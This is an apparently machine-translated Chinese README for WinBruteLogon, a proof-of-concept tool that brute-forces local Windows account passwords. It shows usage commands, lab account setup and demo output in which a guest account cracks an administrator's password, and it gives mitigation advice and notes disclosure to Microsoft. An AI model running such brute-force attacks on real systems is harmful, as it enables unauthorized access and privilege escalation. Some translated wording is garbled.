注意1:我們很高興地宣布,我們當前的工具已移植到PowerShell版本。這意味著用戶現在可以直接從PowerShell命令行訪問和使用該工具,從而使其更加方便和有效。我們認為,這個新版本將極大地使我們的用戶受益,並通過工具增強他們的體驗。感謝您的持續支持,希望您喜歡新的PowerShell版本:https://github.com/darkcodersc/power-brute-logon
注意2:我們最近了解到,Microsoft默認情況下啟用了現代和最新版本Windows的帳戶鎖定策略。此策略通過在一定數量的登錄嘗試失敗後鎖定帳戶來幫助確保系統。儘管這是一項有益的安全措施,但它使概念驗證(POC)在這些系統上效率低下。
發布日期: 2020-05-14
目標:Windows XP到最新的Windows 10版本(1909)
弱點位置: LogonUserA , LogonUserW , CreateProcessWithLogonA , CreateProcessWithLogonW
WinBruteLogon.exe -u <username> -w <wordlist_file>
type <wordlist_file> | WinBruteLogon.exe -u <username> -
Win Brute登錄旨在通過在短時間內猜測大量密碼組合來模擬對Microsoft帳戶的蠻力攻擊。這使申人能夠測試其係統的安全姿勢,並評估他們針對蠻力攻擊的防禦能力。該工具利用缺乏帳戶鎖定機制,這在許多系統中是一個常見的弱點(在Windows 11默認啟用帳戶鎖定之前)。通過嘗試猜測帳戶的密碼,該工具可以幫助申訴人在其安全措施中識別和解決漏洞。它應負責任地在法律的範圍內使用。
為此,我們將在虛擬或物理機器上設置Windows 10的新版本。設置機器後,將其作為管理員登錄。接下來,創建兩個不同的本地帳戶:一個管理員帳戶和一個常規用戶帳戶。請注意,儘管我們將使用演示的來賓帳戶,但此概念證明(POC)不限於訪客帳戶。它可以從任何帳戶或組中使用,包括來賓,常規用戶和管理用戶。
net user darkcodersc /add
net user darkcodersc trousers (褲子是密碼)
net localgroup administrators darkcodersc /add
net user HackMe /add
net user HackMe ozlq6qwm (ozlq6qwm是密碼)
net user GuestUser /add
net localgroup users GuestUser /delete
net localgroup guests GuestUser /add
在我的情況下, trousers和ozlq6qwm都在秘書中:https://github.com/danielmiessler/seclists/seclists/blob/master/master/passwords/common-credentials/10k-most-common.txt
要開始演示,請從管理員帳戶註銷或重新啟動機器並登錄到訪客帳戶。然後,將POC可執行文件放置在您作為來賓用戶訪問的位置。
用法: WinBruteLogon.exe -v -u <username> -w <wordlist_file>
-v是可選的,它設計了詳細模式。
默認情況下,域名是由%USERDOMAIN% env var指定的值。您可以指定帶有選項-d的自定義名稱
darkcodersc (管理員)提示(訪客)> WinBruteLogon.exe -v -u darkcodersc -w 10k-most-common.txt
等待幾秒鐘查看以下結果:
[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=2260, handle=364
[INFO] New "TWorker" Thread created with id=3712, handle=532
[DONE] Done.
[ OK ] Password for username=[darkcodersc] and domain=[DESKTOP-0885FP1] found = [trousers]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=2260, handle=364) Thread successfully terminated.
[INFO] "TWorkers"(id=3712, handle=532) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06
HackMe (常規用戶)提示(訪客)> WinBruteLogon.exe -v -u HackMe -w 10k-most-common.txt
等待幾秒鐘查看以下結果:
[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=5748, handle=336
[INFO] New "TWorker" Thread created with id=4948, handle=140
[DONE] Done.
[ OK ] Password for username=[HackMe] and domain=[DESKTOP-0885FP1] found = [ozlq6qwm]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=5748, handle=336) Thread successfully terminated.
[INFO] "TWorkers"(id=4948, handle=140) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06
“在現實情況下,如果攻擊者獲得對低特權用戶帳戶的訪問權限,他們可能會破解更特權用戶的密碼併升級其特權。為了減輕這種風險,可以採取一些步驟:
要實現安全鎖定策略(默認情況下未啟用),請按照以下步驟:
請注意,鎖定策略不適用於管理員帳戶。在這種情況下,管理員帳戶的最佳保護(如果啟用)是設置一個非常複雜的密碼。
詳細介紹此弱點的報告已發送給Microsoft Security Team。他們應考慮默認情況下啟用帳戶鎖定策略。 ”
(更新2022):默認情況下,帳戶鎖定最終啟用。